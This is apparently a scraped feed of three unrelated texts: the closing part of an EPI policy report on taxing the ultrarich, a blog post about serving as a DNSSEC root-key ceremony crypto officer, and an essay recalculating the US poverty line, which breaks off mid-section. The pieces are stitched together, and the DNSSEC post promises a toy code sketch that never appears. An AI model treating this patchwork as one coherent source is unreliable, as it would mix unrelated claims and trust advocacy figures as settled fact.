Due to this lack of resources and mandates, the IRS instead often took the perverse approach of leveraging enforcement against easy cases—easy both in terms of not taking much capacity and of not generating intense congressional backlash. 19 In practice, this meant intensively auditing recipients of refundable tax credits to look for improper payments. Tax credits are refundable when the amount of a credit (say, the Child Tax Credit) is larger than the taxpayer’s entire income tax liability. In this case, the credit does not just reduce income tax liability; it will also result in an outright payment (hence, refundable) to the taxpayer claiming it. Recipients of these refundable tax credits are, by definition, low-income taxpayers—those with low income tax liability. Besides making the lives of these low-income households more anxious, these audits also just failed to generate much revenue—again, because the group being audited was generally low income and didn’t owe significant taxes in the first place.

The Biden administration included significant new money to boost IRS enforcement capacity as part of the 2022 Inflation Reduction Act (IRA). This extra enforcement capacity was paired with new mandates to reduce the tax gap by increasing enforcement efforts on rich taxpayers.

However, the IRA additions to IRS resources were already being chiseled away before the 2024 presidential election. The Trump administration clearly has no interest in whether or not the IRS consistently enforces revenue collection from the rich. The budget reconciliation bill that Republicans passed through Congress in July rolled back the expanded funding for IRS enforcement. Trump’s proposed fiscal year 2026 budget for IRS funding would chip away at that even further.

The IRS has also not been immune to the Trump administration’s attempt to make life miserable for federal employees. The agency has lost a quarter of its workforce since the start of 2025 to layoffs, the deferred resignation offer pushed by Elon Musk’s so-called Department of Government Efficiency, early retirements, and other separations (TIGTA 2025).

The sharp turn away from the Biden administration’s support of the IRS represents a missed opportunity. While it would be near impossible to fully close the tax gap, Sarin and Summers (2019) estimate that some modest and doable steps could reliably collect significantly over $100 billion per year over the next decade from increased enforcement efforts.

How much could a campaign of confidence-building measures to tax the ultrarich raise?

These measures to enact a series of tax reforms laser-targeted at only the rich could raise significant revenue. One obvious benchmark suggests itself: the current fiscal gap. The fiscal gap is how much (as a share of GDP) taxes would need to be raised or spending would need to be cut to stabilize the ratio of public debt to GDP. Today this gap stands at roughly 2.2%.

Table 1 gives a rough score for each of the provisions mentioned above. It then conservatively estimates the combined revenue-raising potential of this package. It assumes that the whole policy package is equal to 70% of the sum of its parts. This would help account for some fiscal “externalities” (i.e., taxing wealth means wealth grows more slowly over time and, hence, reduces tax collections on income earned from wealth going forward). It also would help account for some potentially duplicative effects that could reduce some revenue collected by the combination of these reforms. For example, if the step-up in basis were eliminated, the incentive for rich households to finance consumption with loans would be reduced, so the revenue generated by treating the pledging of collateral as a realizable event would likely be reduced.

This combination of confidence-building measures to tax the rich would unambiguously be able to close the nation’s current fiscal gap. The sum of the parts of this agenda would raise roughly 4% of GDP over the long run, and even if the sharp 30% discount on the sum of these parts were applied, the total would still be just under 3% of GDP. Telling the American public that this package of tax increases on the ultrarich had put the nation on a fully sustainable long-run trajectory, while still leaving enough money to fund something as large as universal pre-K for 3- and 4-year-olds or a radical expansion of coverage and generosity in the nation’s unemployment insurance system, could be seismic for changing the tax debate in the United States.

For those like us who advocate for even larger expansions of the U.S. system of income support, social insurance, and public investment, the future political debate over how to finance them would be on much more favorable ground with the public’s support. The conditions of the debate would change if the public could shake the (too often true) impression that the U.S. government is failing to ask the ultrarich and corporations to do their part to contribute to the nation’s fiscal needs.

Conclusion

Obviously, this program of laser-targeting tax increases on the ultrarich is not the policy of the current Trump administration or the Republican majority in Congress. They have already spent the first half of 2025 forcing through a monster of a reconciliation bill, which extended the expiring provisions of the TCJA, provisions that provide disproportionate benefits to the very rich. The reconciliation bill represents a shocking upward redistribution of income from the very poor to the very rich, paying for trillions of dollars in tax cuts that primarily benefit the wealthy by stripping health care and food assistance from millions of Americans.

But as damaging as extending these expiring provisions will be to tax fairness and economic outcomes, they might be even more damaging to the public’s confidence that tax policy can ever be reoriented to ensure that the ultrarich and corporations pay their fair share. Instead, the debate over the expiring provisions will draw attention to two facts. First, the large majority of U.S. households will see a tax cut (relative to current law), but these cuts will be much larger for the rich. For example, the bottom 60% of households will see a tax cut of just over $1 per day, while the top 1% will see a cut of $165 per day, and the top 0.1% will see a whopping $860 per day. Second, these regressive tax cuts are bundled with spending cuts that will sharply reduce incomes for the people in the bottom half of the income distribution, leaving them net losers overall.

This combination of facts will continue to feed perceptions that the only way typical households can get something—anything—out of tax policy debates is if they settle for crumbs from the feast enjoyed by the richest. And even these crumbs will be taken back in the form of cuts elsewhere.

It’s time to reverse these perceptions. If policymakers engage in a confidence-building set of measures to raise significant revenue only from the ultrarich, the public’s stance toward tax policy can be changed from being anti-tax to being willing to have debates about the pros and cons of public sector expansions, content in the knowledge that the very rich will neither escape their obligations nor claim the lion’s share of benefits yet again.

Notes

1. Obviously not all of this downward ratchet is bad. The steep decline in tax rates for the poorest families, driven by expanding Earned Income and Child Tax credits, has been a very welcome policy development in recent decades.

2. The strong relationship between the level of gross domestic product (GDP) per capita and the share of the public sector in a nation’s economy is recognized enough to have been named: Wagner’s Law.

3. On the relative smallness of the U.S. fiscal state (both spending and taxation as shares of GDP), see EPI 2025.

4. Bivens and Mishel 2021 note the number of intentional policy changes outside the sphere of taxation that have driven much of the growth in pre-tax inequality.

5. For example, both the Affordable Care Act (ACA) and the Inflation Reduction Act (IRA) paid for the additional spending on public investments and income support programs they called for with new taxes. That said, because Republican-driven tax cuts were passed in the interim, the upshot has been mostly larger budget deficits over time.

6. See Kogan and Vela 2024 for an explanation and estimation of the U.S. fiscal gap in 2024.

7. The rate of return assumption matters a lot for how durable revenue increases from a wealth tax will be over time. A rate of 8.5% is on the high end of many projections for rates of return to wealth in coming decades.

8. Specifically, they note about wealth taxes: “Set the rates medium (2%–3%) and you get revenue for a long time and deconcentration eventually” (Saez and Zucman 2019b). When they estimate the potential revenue of Elizabeth Warren’s 2% wealth tax on net worth over $50 million (with an additional tax of 1% on wealth over a billion), they find it raises roughly 1% of GDP per year (Saez and Zucman 2019a).

9. This estimate comes from the Penn Wharton Budget Model 2022.

10. For a description of that surtax and the competing revenue options debated at the time, see Bivens and Gould 2009.

11. This number has been inflated to 2024 dollars.

12. See Gardner et al. 2024 on the effective corporate income tax rate before and after the TCJA.

13. For example, the Distributional Financial Accounts of the Federal Reserve Board (2025) estimate that the wealthiest 1% of households own over 30% of corporate equities, while the wealthiest 10% own just under 90%.

14. See Sarin and Summers 2019 for how much of the tax gap is driven by poor reporting requirements on income flows disproportionately earned by the rich—mostly various forms of noncorporate business income.

15. This range of estimates comes from the Joint Committee on Taxation (JCT) 2023, and Lautz and Hernandez 2024. Part of this variation is about how much extra revenue is allocated to the strict step-up in basis termination versus the extra revenue that is collected through the normal capital gains tax as a result of closing this loophole.

16. The details of this gap can be found in Office of Tax Analysis 2016. The upshot is that some business owners have managed to deny being active managers of their firms and have, hence, avoided being taxed on labor earnings, but they have somehow also managed to deny being passive owners of their firms, hence avoiding the NIIT as well. It is bizarre that this not-active but not-passive category of owner has been allowed to be given legal status, but that does seem to be the state of the law currently, until Congress acts.

17. See Bivens 2016 on how profits held abroad by deferring taxation were not a constraint on any meaningful economic activity.

18. I say “appear” because the ability and even the specific strategies corporations have to make profits clearly earned by sales in the United States appear on paper to have been earned in tax havens are all extremely well documented by now, including in Zucman 2015.

19. See Elzayn et al. 2023 for evidence that the audit patterns of the IRS in the mid-2010s were driven by these considerations.

References

Batchelder, Lily. 2020 . Leveling the Playing Field Between Inherited Income and Income from Work Through an Inheritance Tax . The Hamilton Project, The Brookings Institution, January 28, 2020.

Bivens, Josh. 2016. “ Freeing Corporate Profits from Their Fair Share of Taxes Is Not the Deal America Needs .” Working Economics Blog (Economic Policy Institute), September 27, 2016.

Bivens, Josh, and Elise Gould. 2009. House Health Care Bill Is Right on the Money: Taxing High Incomes Is Better Than Taxing High Premiums . Economic Policy Institute, December 2009.

Bivens, Josh, and Lawrence Mishel. 2021. Identifying the Policy Levers Generating Wage Suppression and Wage Inequality . Economic Policy Institute, May 2021.

Brun, Lidía, Ignacio González, and Juan Antonio Montecino. 2025. “ Corporate Taxation and Market Power Wealth .” Working Paper, Institute for Macroeconomic Policy Analysis (IMPA), February 12, 2025.

Clausing, Kimberly A., and Natasha Sarin. 2023. The Coming Fiscal Cliff: A Blueprint for Tax Reform in 2025 . The Hamilton Project, The Brookings Institution, September 2023.

Economic Policy Institute (EPI). 2025. U.S. Tax and Spending Explorer .

Elzayn, Hadi, Evelyn Smith, Thomas Hertz, Arun Ramesh, Robin Fisher, Daniel E. Ho, and Jacob Goldin. 2023. “ Measuring and Mitigating Racial Disparities in Tax Audits .” Stanford Institute for Economic Policy Research (SIEPR) Working Paper, January 2023.

Federal Reserve Board. 2025. Distributional Financial Accounts of the United States . Accessed April 2025.

Gardner, Matthew, Michael Ettlinger, Steve Wamhoff, and Spandan Marasini. 2024. Corporate Taxes Before and After the Trump Tax Law . Institute on Taxation and Economic Policy (ITEP), May 2, 2024.

Greenwald, Daniel L., Martin Lettau, and Sydney C. Ludvigson. 2025. “ How the Wealth Was Won: Factor Shares as Market Fundamentals .” Journal of Political Economy 133, no. 4 (April): 1083–1132.

Hemel, Daniel, and Robert Lord. 2021. “ Closing Gaps in the Estate and Gift Tax Base .” Working Paper, Coase-Sandor Working Paper Series in Law and Economics. University of Chicago Law School, August 13, 2021.

Joint Committee on Taxation (JCT). 2023. Estimates of Federal Tax Expenditures for Fiscal Years 2023–2027 . JCX-59-23, December 7, 2023.

Kogan, Bobby, and Jessica Vela. 2024. What Would It Take to Stabilize the Debt-to-GDP Ratio? Center for American Progress, June 5, 2024.

Lautz, Andrew, and Fredrick Hernandez. 2024. Paying the 2025 Tax Bill: Step Up in Basis and Securities-Backed Lines of Credit . Bipartisan Policy Center, December 12, 2024.

Office of Tax Analysis. 2016. Gaps Between the Net Investment Income Tax Base and the Employment Tax Base , April 14, 2016.

Page, Benjamin I., Larry M. Bartels, and Jason Seawright. 2013. “ Democracy and the Policy Preferences of Wealthy Americans .” Perspectives on Politics 11, no. 1 (March): 51–73.

Penn Wharton Budget Model. 2022. Decomposing the Decline in Estate Tax Liability Since 2000 , University of Pennsylvania, July 28, 2022.

Rau, Eli G., and Susan Stokes. 2024. “ Income Inequality and the Erosion of Democracy in the Twenty-First Century .” PNAS 122, no. 1, December 30, 2024.

Saez, Emmanuel, and Gabriel Zucman. 2019a. “ Policy Memo on Wealth Taxes ,” September 22, 2019.

Saez, Emmanuel, and Gabriel Zucman. 2019b. Progressive Wealth Taxation . Brookings Papers on Economic Activity, Fall 2019.

Sarin, Natasha, and Lawrence H. Summers. 2019. “ Shrinking the Tax Gap: Approaches and Revenue Potential .” National Bureau of Economic Research (NBER) Working Paper no. 26475, November 2019.

Tax Policy Center (TPC). 2025. Revenue Estimate of Wealth Tax Proposal from Why Not Initiative.

Treasury Inspector General for Tax Administration (TIGTA). 2025. Snapshot Report: IRS Workforce Reductions as of May 2025 . Report Number 2025-IE-R027. July 18, 2025.

Williamson, Vanessa S. 2017. Read My Lips: Why Americans Are Proud to Pay Taxes . Princeton, N.J.: Princeton Univ. Press, March 2017.

Zucman, Gabriel. 2015. The Hidden Wealth of Nations: The Scourge of Tax Havens . Translated by Teresa Lavender Fagan. Foreword by Thomas Piketty. Univ. of Chicago Press.




Josh Bivens is the chief economist at the Economic Policy Institute (EPI). His areas of research include macroeconomics, inequality, social insurance, public investment, and the economics of globalization.

Bivens has written extensively for both professional and public audiences, with his work appearing in peer-reviewed academic journals (like the Journal of Economic Perspectives) and edited volumes (like The Handbook of the Political Economy of Financial Crises from Oxford University Press), as well as in popular print outlets (like USA Today, the Wall Street Journal and the New York Times).

Bivens is the author of Failure by Design: The Story behind America’s Broken Economy (EPI and Cornell University Press) and Everybody Wins Except for Most of Us: What Economics Really Teaches About Globalization (EPI), and is a co-author of The State of Working America, 12th Edition (EPI and Cornell University Press).

Bivens has provided expert insight to a range of institutions and media, including formally testifying numerous times before committees of the U.S. Congress.

Before coming to EPI, he was an assistant professor of economics at Roosevelt University. He has a Ph.D. in economics from the New School for Social Research and a bachelor’s degree from the University of Maryland at College Park.


Passing the Torch – My Last Root DNSSEC KSK Ceremony as Crypto Officer 4

Hacker News
technotes.seastrom.com
2025-11-24 02:16:42
Comments...
Original Article

Many years ago, when I was but an infant, the first computers were connected on the ARPANET - the seminal computer network that would eventually evolve to become the Internet. Computers at the time were large and expensive; indeed the first version of NCP - the predecessor of TCP/IP - only countenanced roughly 250 computers on the network.

The name (human friendly) to network address (computer friendly) mapping on this network was maintained via a "hosts file" - literally a flat file of ordered pairs, creating the connection between host (computer) name and address.

So it continued: as computers got less expensive and proliferated, the Network Effect caused more institutions to want to be connected to the ARPANET. TCP/IP was developed in response to this, with support for orders of magnitude more connected computers. Along the way, the military users of the network were carved off into their own network, and by the early 1980s we had the beginnings of the Internet, or a "catenet" as it was sometimes called at the time - a network of networks.

Clearly, as we went from "a couple hundred computers" to "capacity for billions", a centrally managed host file wasn't going to scale, and by the early 1980s development had started on a distributed database to replace the centrally managed file. The name for this distributed database was the Domain Name System, or DNS.

It's important to realize that at the time, access to the network of networks was still restricted to a chosen few - higher education, research institutions, military organizations and the military-industrial complex (ARPA, later DARPA, was, after all, an activity of the United States Department of Defense), and a few companies that were tightly associated with one or more of those constituencies. Broad public commercial access to the Internet was many years in the future.

It was in this environment that the DNS sprang forth. Academics, military researchers, university students - a pretty collegial environment. Not to mention paleo-cybersecurity practices - indeed the word "cybersecurity" may not have even been coined yet, though the notion of "computer security" dates back to the early 1970s.

I've mentioned this brief "history of the early Internet" to preemptively answer the question which inevitably arises: why didn't DNS have better security built in? The answer is twofold: firstly it didn't have to based on the environment that it evolved in, and secondly, even if it had, the security practices would have been firmly rooted in 1980s best practices, which would certainly be inadequate by modern standards.

Discovery of security flaws in 1990 led the IETF to begin development on Domain Name System Security Extensions (DNSSEC) in 1995. Early versions were difficult to deploy. Later versions improved somewhat. But inertia is a thing, the status quo tends to prevail, and there was very real concern that DNSSEC would be a net reliability minus (security vs. availability can be a tricky circle to square), concentrate power in undesirable ways, and result in other unforeseen negative effects.

At the end of the day, as it so often does, it took a crisis to get the ball rolling for real. In 2008, Dan Kaminsky discovered a fundamental flaw in DNS, which simplified cache poisoning - essentially making it possible for an attacker to misdirect users to arbitrary web sites.

In less than two years, the DNS root would be cryptographically signed - allowing those who wished to sign their domains as well to create a cryptographic chain of trust authenticating their DNS lookups. This is non-repudiation, not non-disclosure - DNS queries and responses continued to happen in the clear. But this time, responses came back with a digital signature, courtesy of DNSSEC.

David Huberman at ICANN did a splendid slide deck explaining how it all works .

Trust in a system requires more than technical correctness. It involves trust in the execution of running the system itself. For that reason ICANN decided that it would build a framework to facilitate trust and transparency. Among other things it included:

  • Placing the cryptographic material in two highly secure sites, one near Washington DC and one in Los Angeles (geographic diversity)
  • Creating a multi-layered security regimen requiring several people to access the Key Management Facility
  • Storing cryptographic material in offline HSMs which utilize Shamir's Secret Sharing to require a quorum of at least 3 out of 7 Crypto Officers to be present in order to "wake them up" (a toy sketch of the scheme follows this list)
  • Trusted Community Representatives with roles of Crypto Officer and Recovery Key Share Holder
  • Highly scripted (and therefore auditable) ceremonies surrounding the handling of the cryptographic material
  • Live streaming all events
  • Hosting External Witnesses from the community who have expressed interest in being present for a ceremony in person
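For readers curious about the threshold scheme mentioned above, here is a toy Python sketch of Shamir's Secret Sharing with a 3-of-7 quorum. Production HSMs use vetted implementations with much larger parameters; this only illustrates the property that any three of the seven shares reconstruct the secret, while fewer do not:

```python
import random

PRIME = 2**127 - 1   # a Mersenne prime, large enough for a toy secret

def make_shares(secret, threshold=3, n=7):
    """Split `secret` into n shares; any `threshold` of them recover it."""
    coeffs = [secret] + [random.randrange(PRIME) for _ in range(threshold - 1)]
    def poly(x):
        return sum(c * pow(x, i, PRIME) for i, c in enumerate(coeffs)) % PRIME
    return [(x, poly(x)) for x in range(1, n + 1)]

def recover(shares):
    """Lagrange interpolation at x = 0 over the prime field."""
    secret = 0
    for i, (xi, yi) in enumerate(shares):
        num = den = 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * (-xj) % PRIME
                den = den * (xi - xj) % PRIME
        secret = (secret + yi * num * pow(den, -1, PRIME)) % PRIME
    return secret

secret = 0xC0FFEE
shares = make_shares(secret)                         # one share per Crypto Officer
assert recover(random.sample(shares, 3)) == secret   # any 3 of the 7 suffice
print("3-of-7 reconstruction works:", hex(recover(shares[:3])))
```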

When the call for volunteers to be Trusted Community Representatives came out, I was no stranger to community involvement, having served several years on the ARIN Advisory Council and done community work (and later Board work) for NANOG. I was employed by a Top Level Domain operator, and submitted my CV and expressed my interest.

That's how I found myself in Culpeper, Virginia in 2010 as Crypto Officer 4 at the first ceremony for signing the DNSSEC Root. I had no idea that I would still be doing it fifteen years later. I was the last of the original Crypto Officers for KMF-East, and the second last overall - outlasted only by Subramanian "SM" Moonesamy, who is Crypto Officer 7 for KMF-West.

It's been an adventure. I've been a small participant in root key rolls, put in a B-roll appearance on BBC Horizon (S53E13), become friends with many of the people I served with, overseen ceremonies remotely during the COVID lockdown, and witnessed an amazing pivot by ICANN staff who managed to get new HSMs selected, tested, integrated, and deployed on only 8 months' notice, a feat which I remain in awe of.

I was an early advocate for improving trust in our process by leveraging natural turnover and backfilling existing TCRs with people selected from a broader set of qualified individuals than just the fellowship of DNS protocol experts, operators, and developers. I'm grateful that our voices were heard.

On November 13th 2025, I passed the torch to Lodrina Cherne who is now Crypto Officer 4 for KMF-East. Lodrina is a security researcher, an educator with an emphasis on digital forensics, and works in security engineering at a large cloud provider. I'm honored to have her as my successor.

I've had several people reach out to me to ask what prompted me to step back from the ICANN volunteer work. Those who were hoping for some kind of salacious dirt or scandal were sorely disappointed - quite the opposite, this is a huge success story and I'm pleased to have been able to do my small part. A direct cut and paste from Slack logs with one of them follows:

What led you to step back from ICANN?

Several things:

  • It was understood to be a 5 year commitment. I've been doing it for more than 15.
  • It was broadly agreed among the cohort many years ago (over a decade ago) that more people from more diverse backgrounds than just DNS-old-boy-network (which was the original group of TCRs) was a Good Thing.
  • Many people cycled out earlier; I was happy to let the folks for whom travel was more odious go first. But it's only practical and only really good for the system to cycle out a single TCR per ceremony.
  • COVID delayed this. Kaminsky's untimely death and subsequent replacement as a recovery key shareholder (RKSH) delayed this.
  • A further delay was the AEP Keyper HSM getting abruptly EOLed, and the transition to the Thales Luna HSMs. It went off without a hitch after being researched, developed, and executed in 8 months - a record which I stand in awe of and which is a true testament to the skill and commitment of the ICANN PTI team. ICANN expressed the desire for continuity among long-serving COs past that milestone; Frederico Neves (fellow original Crypto Officer) and I were willing to extend our stay for that.

So in short it was time to pass the torch. Everyone has been doing everything right. I remarked at the end of the Ceremony 59 that when we started doing this 15 years ago, success was not guaranteed; it took the Kaminsky bug to get us over the line to actually deploy it. Today, the major Unix DNS resolvers ship with DNSSEC validation enabled. All of the major public DNS resolvers (google, quad9, cloudflare) do DNSSEC validation. I thanked everyone who has been responsible for and put their personal credibility on the line for the security, integrity, and credibility of this process and stated that I was honored to have been able to play a small part in doing that.

Epilogue:

I won't be participating in most East Coast ceremonies from here on out, but I don't rule out occasionally showing up as an external witness, particularly at KMF-West where I have never visited in person.

Here are scans of our ceremony scripts from both Ceremony 59 and the previous day's administrative ceremonies.

Root DNSSEC KSK Ceremony 59

Root DNSSEC KSK Administrative Ceremony 59 Backup HSM Acceptance Testing

Root DNSSEC KSK Administrative Ceremony 59 Safe #2 Credentials Safe Deposit Box Lock Assembly Programming

kskm-ksrsigner-logs.pdf

My Life Is a Lie: How a Broken Benchmark Broke America

Hacker News
www.yesigiveafig.com
2025-11-24 02:05:01
Comments...
Original Article

We’re going to largely skip markets again, because the sweater is rapidly unraveling in other areas as I pull on threads. Suffice it to say that the market is LARGELY unfolding as I had expected — credit stress is rising, particularly in the tech sector. Many are now pointing to the rising CDS for Oracle as the deterioration in “AI” balance sheets accelerates. CDS was also JUST introduced for META — it traded at 56, slightly worse than the aggregate IG CDS at 54.5 (itself up from 46 since I began discussing this topic):

Correlations are spiking as MOST stocks move in the same direction each day even as megacap tech continues to define the market aggregates:

Market pricing of correlation is beginning to pick up… remember this is the “real” fear index and the moving averages are trending upwards:

And, as I predicted, inflation concerns, notably absent from any market-based indication, are again freezing the Fed. The pilots are frozen, understanding that they are in Zugzwang: every available move makes the position worse.

And so now, let’s tug on that loose thread… I’m sure many of my left-leaning readers will say, “This is obvious, we have been talking about it for YEARS!” Yes, many of you have; but you were using language of emotion (“Pay a living wage!”) rather than showing the math. My bad for not paying closer attention; your bad for not showing your work or coming up with workable solutions. Let’s rectify it rather than cast blame.

I have spent my career distrusting the obvious.

Markets, liquidity, factor models—none of these ever felt self-evident to me. Markets are mechanisms of price clearing. Mechanisms have parameters. Parameters distort outcomes. This is the lens through which I learned to see everything: find the parameter, find the distortion, find the opportunity.

But there was one number I had somehow never interrogated. One number that I simply accepted, the way a child accepts gravity.

The poverty line.

I don’t know why. It seemed apolitical, an actuarial fact calculated by serious people in government offices. A line someone else drew decades ago that we use to define who is “poor,” who is “middle class,” and who deserves help. It was infrastructure—invisible, unquestioned, foundational.

This week, while trying to understand why the American middle class feels poorer each year despite healthy GDP growth and low unemployment, I came across a sentence buried in a research paper:

“The U.S. poverty line is calculated as three times the cost of a minimum food diet in 1963, adjusted for inflation.”

I read it again. Three times the minimum food budget.

I felt sick.

The formula was developed by Mollie Orshansky, an economist at the Social Security Administration. In 1963, she observed that families spent roughly one-third of their income on groceries. Since pricing data were hard to come by for many other items (housing, for example), the logic ran that if you could calculate a minimum adequate food budget at the grocery store, you could multiply it by three and establish a poverty line.

Orshansky was careful about what she was measuring. In her January 1965 article, she presented the poverty thresholds as a measure of income inadequacy , not income adequacy—”if it is not possible to state unequivocally ‘how much is enough,’ it should be possible to assert with confidence how much, on average, is too little.”

She was drawing a floor. A line below which families were clearly in crisis.

For 1963, that floor made sense. Housing was relatively cheap. A family could rent a decent apartment or buy a home on a single income, as we’ve discussed. Healthcare was provided by employers and cost relatively little (Blue Cross coverage averaged $10/month). Childcare didn’t really exist as a market—mothers stayed home, family helped, or neighbors (who likely had someone home) watched each other’s kids. Cars were affordable, if prone to breakdowns. With few luxury frills, the neighborhood kids in vo-tech could fix most problems when they did. College tuition could be covered with a summer job. Retirement meant a pension income, not a pile of 401(k) assets you had to fund yourself.

Orshansky’s food-times-three formula was crude, but as a crisis threshold—a measure of “too little”—it roughly corresponded to reality. A family spending one-third of its income on food would spend the other two-thirds on everything else, and those proportions more or less worked. Below that line, you were in genuine crisis. Above it, you had a fighting chance.

But everything changed between 1963 and 2024.

Housing costs exploded. Healthcare became the largest household expense for many families. Employer coverage shrank while deductibles grew. Childcare became a market, and that market became ruinously expensive. College went from affordable to crippling. Transportation costs rose as cities sprawled and public transit withered under government neglect.

The labor model shifted. A second income became mandatory to maintain the standard of living that one income formerly provided. But a second income meant childcare became mandatory, which meant two cars became mandatory. Or maybe you’d simply be “asking for a lot generationally speaking” because living near your parents helps to defray those childcare costs.

The composition of household spending transformed completely. In 2024, food-at-home is no longer 33% of household spending. For most families, it’s 5 to 7 percent.

Housing now consumes 35 to 45 percent. Healthcare takes 15 to 25 percent. Childcare, for families with young children, can eat 20 to 40 percent.

If you keep Orshansky’s logic—if you maintain her principle that poverty could be defined by the inverse of food’s budget share—but update the food share to reflect today’s reality, the multiplier is no longer three.

It becomes sixteen.

Which means if you measured income inadequacy today the way Orshansky measured it in 1963, the threshold for a family of four wouldn’t be $31,200.

It would be somewhere between $130,000 and $150,000.

And remember: Orshansky was only trying to define “too little.” She was identifying crisis, not sufficiency. If the crisis threshold—the floor below which families cannot function—is honestly updated to current spending patterns, it lands at $140,000.

What does that tell you about the $31,200 line we still use?

It tells you we are measuring starvation.

“An imbalance between rich and poor is the oldest and most fatal ailment of all republics.” — Plutarch

The official poverty line for a family of four in 2024 is $31,200. The median household income is roughly $80,000. We have been told, implicitly, that a family earning $80,000 is doing fine—safely above poverty, solidly middle class, perhaps comfortable.

But if Orshansky’s crisis threshold were calculated today using her own methodology, that $80,000 family would be living in deep poverty.

I wanted to see what would happen if I ignored the official stats and simply calculated the cost of existing. I built a Basic Needs budget for a family of four (two earners, two kids). No vacations, no Netflix, no luxury. Just the “Participation Tickets” required to hold a job and raise kids in 2024.

Using conservative, national-average data:

  • Childcare: $32,773

  • Housing: $23,267

  • Food: $14,717

  • Transportation: $14,828

  • Healthcare: $10,567

  • Other essentials: $21,857

Required net income: $118,009

Add federal, state, and FICA taxes of roughly $18,500, and you arrive at a required gross income of $136,500.
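
The total above is easy to verify. Here is a minimal Python sketch using only the line items quoted (the variable names are mine):

  basic_needs = {
      "childcare": 32_773,
      "housing": 23_267,
      "food": 14_717,
      "transportation": 14_828,
      "healthcare": 10_567,
      "other_essentials": 21_857,
  }

  required_net = sum(basic_needs.values())   # 118,009
  taxes = 18_500                             # federal + state + FICA, as quoted
  required_gross = required_net + taxes      # 136,509, i.e. roughly $136,500

  print(required_net, required_gross)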

This is Orshansky’s “too little” threshold, updated honestly. This is the floor.

The single largest line item isn’t housing. It’s childcare: $32,773.

This is the trap. To reach the median household income of $80,000, most families require two earners. But the moment you add the second earner to chase that income, you trigger the childcare expense.

If one parent stays home, the income drops to $40,000 or $50,000—well below what’s needed to survive. If both parents work to hit $100,000, they hand over $32,000 to a daycare center.

The second earner isn’t working for a vacation or a boat. The second earner is working to pay the stranger watching their children so they can go to work and clear $1-2K extra a month. It’s a closed loop.

Critics will immediately argue that I’m cherry-picking expensive cities. They will say $136,500 is a number for San Francisco or Manhattan, not “Real America.”

So let’s look at “Real America.”

The model above allocates $23,267 per year for housing. That breaks down to $1,938 per month. This is the number that serious economists use to tell you that you’re doing fine.

In my last piece, Are You An American?, I analyzed a modest “starter home,” which turned out to be in Caldwell, New Jersey—the kind of place a Teamster could afford in 1955. I went to Zillow to see what it costs to live in that same town if you don’t have a down payment and are forced to rent.

There are exactly seven 2-bedroom+ units available in the entire town. The cheapest one rents for $2,715 per month.

That’s a $777 monthly gap between the model and reality. That’s $9,300 a year in post-tax money. To cover that gap, you need to earn an additional $12,000 to $13,000 in gross salary.
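
A quick Python sketch of that gap arithmetic. Note that the 25 to 30 percent combined marginal tax rates are my own illustrative assumption, chosen only to show how a roughly $9,300 post-tax gap maps to the $12,000 to $13,000 in gross salary mentioned above.

  model_rent = 1_938       # monthly housing in the national-average model
  caldwell_rent = 2_715    # cheapest 2-bedroom+ listing cited above

  monthly_gap = caldwell_rent - model_rent   # 777
  annual_gap = monthly_gap * 12              # 9,324 post-tax, roughly $9,300

  # Assumed combined marginal tax rates (illustrative, not from the source):
  for rate in (0.25, 0.28, 0.30):
      print(round(annual_gap / (1 - rate)))  # ~12,400 to ~13,300 in gross salary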

So when I say the real poverty line is $140,000, I’m being conservative. I’m using optimistic, national-average housing assumptions. If we plug in the actual cost of living in the zip codes where the jobs are—where rent is $2,700, not $1,900—the threshold pushes past $160,000.

The market isn’t just expensive; it’s broken. Seven units available in a town of thousands? That isn’t a market. That’s a shortage masquerading as an auction.

And that $2,715 rent check buys you zero equity. In the 1950s, the monthly housing cost was a forced savings account that built generational wealth. Today, it’s a subscription fee for a roof. You are paying a premium to stand still.

Economists will look at my $140,000 figure and scream about “hedonic adjustments.” Heck, I will scream at you about them. They are valid attempts to measure the improvement in quality that we honestly value.

I will tell you that comparing 1955 to 2024 is unfair because cars today have airbags, homes have air conditioning, and phones are supercomputers. I will argue that because the quality of the good improved, the real price dropped.

And I would be making a category error. We are not calculating the price of luxury. We are calculating the price of participation.

To function in 1955 society—to have a job, call a doctor, and be a citizen—you needed a telephone line. That “Participation Ticket” cost $5 a month.

Adjusted for standard inflation, that $5 should be $58 today.

But you cannot run a household in 2024 on a $58 landline. To function today—to two-factor authenticate your bank account, to answer work emails, to check your child’s school portal (which is now digital-only)—you need a smartphone plan and home broadband.

The cost of that “Participation Ticket” for a family of four is not $58. It’s $200 a month.

The economists say, “But look at the computing power you get!”

I say, “Look at the computing power I need!”

The utility I’m buying is “connection to the economy.” The price of that utility didn’t just keep pace with inflation; it tripled relative to it.

I ran this “Participation Audit” across the entire 1955 budget. I didn’t ask “is the car better?” I asked “what does it cost to get to work?”

Healthcare: In 1955, Blue Cross family coverage was roughly $10/month ($115 in today’s dollars). Today, the average family premium is over $1,600/month. That’s 14x inflation.

Taxes (FICA): In 1955, the Social Security tax was 2.0% on the first $4,200 of income. The maximum annual contribution was $84. Adjusted for inflation, that’s about $960 a year. Today, a family earning the median $80,000 pays over $6,100. That’s 6x inflation.

Childcare: In 1955, this cost was zero because the economy supported a single-earner model. Today, it’s $32,000. That’s an infinite increase in the cost of participation.

The only thing that actually tracked official CPI was… food. Everything else—the inescapable fees required to hold a job, stay healthy, and raise children—inflated at multiples of the official rate when considered on a participation basis. YES, these goods and services are BETTER. I would not trade my 65” 4K TV mounted flat on the wall for a 25” CRT dominating my living room; but I don’t have a choice, either.
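
Recomputing those audit ratios from the figures quoted above (with the 1955 costs already expressed in today's dollars), as a small Python sketch:

  audit = {
      # item: (1955 cost in today's dollars, 2024 cost)
      "phone vs. smartphone + broadband (monthly)": (58, 200),
      "healthcare premium (monthly)": (115, 1_600),
      "FICA at median income (annual)": (960, 6_100),
  }

  for item, (then, now) in audit.items():
      print(f"{item}: {now / then:.1f}x")   # ~3.4x, ~13.9x, ~6.4x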

Once I established that $136,500 is the real break-even point, I ran the numbers on what happens to a family climbing the ladder toward that number.

What I found explains the “vibes” of the economy better than any CPI print.

Our entire safety net is designed to catch people at the very bottom, but it sets a trap for anyone trying to climb out. As income rises from $40,000 to $100,000, benefits disappear faster than wages increase.

I call this The Valley of Death.

Let’s look at the transition for a family in New Jersey:

1. The View from $35,000 (The “Official” Poor)

At this income, the family is struggling, but the state provides a floor. They qualify for Medicaid (free healthcare). They receive SNAP (food stamps). They receive heavy childcare subsidies. Their deficits are real, but capped.

2. The Cliff at $45,000 (The Healthcare Trap)

